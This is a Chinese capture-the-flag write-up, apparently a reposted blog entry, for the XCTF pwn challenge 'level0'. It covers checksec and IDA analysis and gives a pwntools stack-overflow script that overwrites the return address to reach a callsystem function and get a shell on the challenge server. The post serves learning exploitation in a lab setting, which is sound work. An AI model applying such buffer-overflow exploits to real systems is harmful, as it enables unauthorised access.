码迷,mamicode.com
首页 > 其他好文 > 详细

攻防世界—pwn—level0

时间:2020-04-03 20:13:16      阅读:209      评论:0      收藏:0      [点我收藏+]

标签:src   code   after   cti   roc   一个   pre   下载   文件   

题目分析

下载文件后首先使用checksec检查文件保护机制

文件名太长了,就更改了一下

技术图片

发现是一个64位程序,使用ida查看伪代码

技术图片

注意到一个特殊的函数名callsystem

技术图片

确定思路,直接栈溢出

信息收集

确定偏移量

技术图片

/bin/sh地址

方法1

技术图片

方法2

技术图片

编写脚本

from pwn import *

p = remote(‘111.198.29.45‘,32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

本地测试

技术图片

靶机测试

技术图片
技术图片

攻防世界—pwn—level0

标签:src   code   after   cti   roc   一个   pre   下载   文件   

原文地址:https://www.cnblogs.com/anweilx/p/12628337.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!